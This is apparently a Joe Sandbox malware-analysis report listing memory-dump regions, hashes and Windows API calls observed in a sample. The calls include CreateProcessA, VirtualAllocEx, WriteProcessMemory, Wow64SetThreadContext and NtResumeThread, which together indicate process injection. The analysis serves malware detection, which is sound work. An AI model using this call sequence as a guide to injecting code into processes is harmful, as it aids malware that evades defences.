                                                                          • Source File: 00000003.00000002.3323401280.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_5ae0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "$Haq$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                          • API String ID: 0-2373693423
                                                                          • Opcode ID: d8b2c7339192e5cf30d1161dccbccb89c7a9d0d9b79c1fe4e635e7adcc200c0e
                                                                          • Instruction ID: da0e8d5cf9f40f86ee10436593f2133d4d83a7f708ae07eba401475d95b6a107
                                                                          • Opcode Fuzzy Hash: d8b2c7339192e5cf30d1161dccbccb89c7a9d0d9b79c1fe4e635e7adcc200c0e
                                                                          • Instruction Fuzzy Hash: 2E12F3B4E002188FDB58DF69D994B9DBBF6BF89300F1084A9D809A7365DB359E85CF10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3323401280.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_5ae0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "$Haq$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                          • API String ID: 0-2373693423
                                                                          • Opcode ID: fe28bcd5b873a200eee01996358d24cd2bcf7a6d9734c24f43ae0d5b8acf8fb3
                                                                          • Instruction ID: 6b18f9a1c13fc4faedd439d93c62c34719ccefb5134dc0100fa736644630996e
                                                                          • Opcode Fuzzy Hash: fe28bcd5b873a200eee01996358d24cd2bcf7a6d9734c24f43ae0d5b8acf8fb3
                                                                          • Instruction Fuzzy Hash: 6012C1B4E002188FDB58DF69D994B9DBBF2BF89300F1084A9D819A7365DB359E85CF10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3323401280.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_5ae0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                          • API String ID: 0-3604444728
                                                                          • Opcode ID: 7297caa0f1febf5d0c08a023af1e27cbe313328e67043e7873776efd5106c592
                                                                          • Instruction ID: f89e9b1caadd363c24d2166cfd78a8ef56b1324bb92ed738c4d8bc8ca4a08ed5
                                                                          • Opcode Fuzzy Hash: 7297caa0f1febf5d0c08a023af1e27cbe313328e67043e7873776efd5106c592
                                                                          • Instruction Fuzzy Hash: F632B0B4E00218CFDB68CF69D994B9DBBB2BF89300F1084A9D909A7365DB755E85CF10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.3314634882.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_2d20000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \;]q$\;]q$\;]q$\;]q
                                                                          • API String ID: 0-2351511683
                                                                          • Opcode ID: 9102db545506dd3e6b8457723456591a83f710c482c14022d04dcd4cf413698f
                                                                          • Instruction ID: c183471ca9250d575a5591b66d12b177ae6badad86d67badb99d1ab8bbe09783
                                                                          • Opcode Fuzzy Hash: 9102db545506dd3e6b8457723456591a83f710c482c14022d04dcd4cf413698f
                                                                          • Instruction Fuzzy Hash: 35015E31740234CF87548A2DC69092677EEAF98A6873545AAE441CB3B1DA62DC45D7D0

                                                                          Execution Graph

                                                                          Execution Coverage:14.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:538
                                                                          Total number of Limit Nodes:58
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: df480b298c9a5210bb5fa4d2e7fd37c028cab2a1c1a643bc8e9abe91dd10dcd6
                                                                          • Instruction ID: 1a0926e9cb69df8602d8e3d211acc2f162a1a2a1ae4aed237a59733addde5e19
                                                                          • Opcode Fuzzy Hash: df480b298c9a5210bb5fa4d2e7fd37c028cab2a1c1a643bc8e9abe91dd10dcd6
                                                                          • Instruction Fuzzy Hash: 692228B4A01218CFDB94DF99D984BA9BBF2FB89301F5091AAD40DA7354DB349D81CF60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: d0b06937edf2037dae43a2db28a2c23745dde3ac2a8d9a58b106db3310684597
                                                                          • Instruction ID: e20969740cc016848ea82769da48099610a945dd117fed4c2f1a526273d5b33a
                                                                          • Opcode Fuzzy Hash: d0b06937edf2037dae43a2db28a2c23745dde3ac2a8d9a58b106db3310684597
                                                                          • Instruction Fuzzy Hash: 3F1218B4A05218CFDB94DF99D984BA9BBF2FB8A300F5091AAD40DA7345DB345D81CF60
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0769D021
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: f62c61aed59f4565c4db854c2a57b43507c2f20fd264e22e04c9af2a6486c053
                                                                          • Instruction ID: c4c69da2ec0f6c2b7977bb7f29640ec3101dcc03f152f11b8bf02aa4de50344b
                                                                          • Opcode Fuzzy Hash: f62c61aed59f4565c4db854c2a57b43507c2f20fd264e22e04c9af2a6486c053
                                                                          • Instruction Fuzzy Hash: BA21F2B5D013099FCB10DFAAD980AEEFBF5FF48310F20842AE519A7210C775A945CBA1
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0769D021
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: 6decf930b3179997d2a2d3c043d42efd943821bfffde5b97f1bb779dd0082aa6
                                                                          • Instruction ID: cf67347c1f707203305fce6e5cc2b86f97ddd4daf81fe0718613b405f3548057
                                                                          • Opcode Fuzzy Hash: 6decf930b3179997d2a2d3c043d42efd943821bfffde5b97f1bb779dd0082aa6
                                                                          • Instruction Fuzzy Hash: 822114B5D013099FCB10DFAAD980AEEFBF5FF48310F20842AE519A7210C775A941CBA0
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 0769F49E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 0250a0632ee70a9e2cd93c99500083ef66917d68c83ac3af74e1a1a3c2c5d3d5
                                                                          • Instruction ID: 7ed218de8f5933a1cdab168ff2e8a03f3dd930f26c9046eb2ddad122d702185c
                                                                          • Opcode Fuzzy Hash: 0250a0632ee70a9e2cd93c99500083ef66917d68c83ac3af74e1a1a3c2c5d3d5
                                                                          • Instruction Fuzzy Hash: 58111AB1D002099FCB10DFAAC845AEEFBF8FF48724F50842AD419A7250CB789545CFA1
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 0769F49E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 097082c75b51c13df34432e3c564c495801a6ea884f11fde19a1de4554c2bc4c
                                                                          • Instruction ID: 8accf739d3cb9f82f610f3e994624d191168b39f8efc0d9b958e49e1cd2fd1cd
                                                                          • Opcode Fuzzy Hash: 097082c75b51c13df34432e3c564c495801a6ea884f11fde19a1de4554c2bc4c
                                                                          • Instruction Fuzzy Hash: 8D11E7B1D002099FDB10DFAAC444AEEFBF9FF48724F50842AD419A7250CB79A945CFA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 83b182d710cc99840441505eab76bfbfb9c9c97bb35acaff4248a4306cab6d80
                                                                          • Instruction ID: 6fea80cc36e8ae77f30d248e856a6068d65cee7054926ef4e3a6787003aa2042
                                                                          • Opcode Fuzzy Hash: 83b182d710cc99840441505eab76bfbfb9c9c97bb35acaff4248a4306cab6d80
                                                                          • Instruction Fuzzy Hash: 76B1F6B8E05258CFDB94CF69DA94BDDBBF2BF89300F20956AD409AB251DB345985CF00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7
                                                                          • API String ID: 0-1790921346
                                                                          • Opcode ID: 9cb921f2b03c9e391d127c105f97e14a1328efc35ccba743cb75660aa2285800
                                                                          • Instruction ID: 03dfc28af0feebc1c365410a0f9033908dc869e2592ac14cf256bac930295571
                                                                          • Opcode Fuzzy Hash: 9cb921f2b03c9e391d127c105f97e14a1328efc35ccba743cb75660aa2285800
                                                                          • Instruction Fuzzy Hash: CF415EB5E04A588BEB58CF6BDD4469AFAF7BFC9201F14C1BA840CA6254DB3409869F01
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a65299a3650905a8572068b76f10b13d32c3c7789abe314e17334335aa748dd
                                                                          • Instruction ID: 2131c106ec3f857c25a1e011225e32062f0a917997474ef9375a0138fe6123d5
                                                                          • Opcode Fuzzy Hash: 6a65299a3650905a8572068b76f10b13d32c3c7789abe314e17334335aa748dd
                                                                          • Instruction Fuzzy Hash: 48E1D6B4E05218CFDBA4CF66D984BDEBBF2BB4A304F1094AAD009A7351DB345985CF42
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8ccea3e5524451c553b788a242e97074bfc25b4367c787d97c1bed45a6333f5
                                                                          • Instruction ID: 584019e5372ff57dd2a4f0e081fd94352959fca6b42c11372ee3d055b38458be
                                                                          • Opcode Fuzzy Hash: b8ccea3e5524451c553b788a242e97074bfc25b4367c787d97c1bed45a6333f5
                                                                          • Instruction Fuzzy Hash: CEE1C5B4E05218CFDBA4CF66D984BEDBBF2AB4A305F10D4AAD009A7251DB345985CF42

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q$4']q
                                                                          • API String ID: 0-705557208
                                                                          • Opcode ID: 101adfe53ad72dbcbe323f8b0ce4c973c3e1317392084d1aa5767d44ef16dd90
                                                                          • Instruction ID: 3afe1d921c1440b12f0099d8560952620aaf19f5ff21e60574b672cc4f90ffe0
                                                                          • Opcode Fuzzy Hash: 101adfe53ad72dbcbe323f8b0ce4c973c3e1317392084d1aa5767d44ef16dd90
                                                                          • Instruction Fuzzy Hash: 34F1F974A10219DFCB08DFA4D998A9DB7B2FF88300F518559E506AB3A5DB70FC42CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520478626.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7480000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 245f9be01d33b5d822a85c9ca8f15d04d99ebfcdb5c19eb8d5c05ca2640f0e38
                                                                          • Instruction ID: d6c54d4f4e6937b1d74a1406cd6cabbcb07e0e01e6cf3e9afd8abc5fc87afeef
                                                                          • Opcode Fuzzy Hash: 245f9be01d33b5d822a85c9ca8f15d04d99ebfcdb5c19eb8d5c05ca2640f0e38
                                                                          • Instruction Fuzzy Hash: 1A42C2B4E0420ECFCB54EBA8D598AEEBBB2FF49301F50841AD912AB354CB745946CF51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520478626.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7480000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 5c7eb93e633eda4f0d44974cde87a51087022f3117f9569d1d64f4665c37cc56
                                                                          • Instruction ID: b998beaac349070a2dcd97e6bd237c295a8db05d521e1b874bf3f5fe57446400
                                                                          • Opcode Fuzzy Hash: 5c7eb93e633eda4f0d44974cde87a51087022f3117f9569d1d64f4665c37cc56
                                                                          • Instruction Fuzzy Hash: DAF1A1B4D1121DEFCB64EFA4E4986EDBBB2BF49312F20442AE406A7354CB755886CF41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$Haq
                                                                          • API String ID: 0-3785302501
                                                                          • Opcode ID: 7cdf4eada8c40bb0d9757219554fd93180e3de080177e1be1b39688b0d444c53
                                                                          • Instruction ID: 34aa8c1ede795296bf69b099abec59f89a025c5837e5b4968e7b4884deae6af0
                                                                          • Opcode Fuzzy Hash: 7cdf4eada8c40bb0d9757219554fd93180e3de080177e1be1b39688b0d444c53
                                                                          • Instruction Fuzzy Hash: 765123B52047518FD365CF39C4903ABBBE2EF81320F148A6ED0568B7A5EB74E80AC751
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0769DBE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 3d793b8be0573957f46fe2cffd14be50a40bf528969dcfdc5c9e00ba5373cdf0
                                                                          • Instruction ID: 141018b55eae0ebb9a5d40cec05bd51aacaca784cfaf8feec8a4b200d6ef1241
                                                                          • Opcode Fuzzy Hash: 3d793b8be0573957f46fe2cffd14be50a40bf528969dcfdc5c9e00ba5373cdf0
                                                                          • Instruction Fuzzy Hash: 068115B1E0065A9FDF10CFA9C8817ADBBF5AF48314F148539E85AA7384DB749891CB81
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0769DBE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07693EB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07693EB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 076942EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0769EE50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0769EE50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0769E596
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 076942EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076297AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0769E596
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076297AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0769EB8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0769EB8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: paq
                                                                          • API String ID: 0-3273118895
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          • API String ID: 0-3334018834
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          • API String ID: 0-3334018834
                                                                          • Opcode ID: 01935031ea9b941f41ec2ad21001b495489bd082c0084dcd94bfb82085b2b394
                                                                          • Instruction ID: acfb88cf70bb55e55cacb10296675919e48ef8d5a9a7715633591944470b107b
                                                                          • Opcode Fuzzy Hash: 01935031ea9b941f41ec2ad21001b495489bd082c0084dcd94bfb82085b2b394
                                                                          • Instruction Fuzzy Hash: 753116B8E04109CBDB44DFAAC4816EEBBF6FB89301F50946AD805A3344D7389981CFA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520478626.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7480000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: 2a82aacb7504b08543b5c0d45fbe6b16fcc0ae78dae8e07e312cc06e1ff28ee7
                                                                          • Instruction ID: e124bf6165bb46caf2ef87807dc7f63b18d753da8d02143ded15bf9575dc92b5
                                                                          • Opcode Fuzzy Hash: 2a82aacb7504b08543b5c0d45fbe6b16fcc0ae78dae8e07e312cc06e1ff28ee7
                                                                          • Instruction Fuzzy Hash: 1821E2B4E0020ECFDB58EBA9D4446FEBBB1BB85301F50856BD511A7250CB745A46CF91
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0749111B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520513400.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7490000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Instruction ID: 5a95cf7e7bfceba3e66f498b28681f616d637758e29a04d1119c74ff6e2208a3
                                                                          • Opcode Fuzzy Hash: 1e9502df66cf984e36e8238e907088e4ddbcf60e9f97e10729423e553c97656c
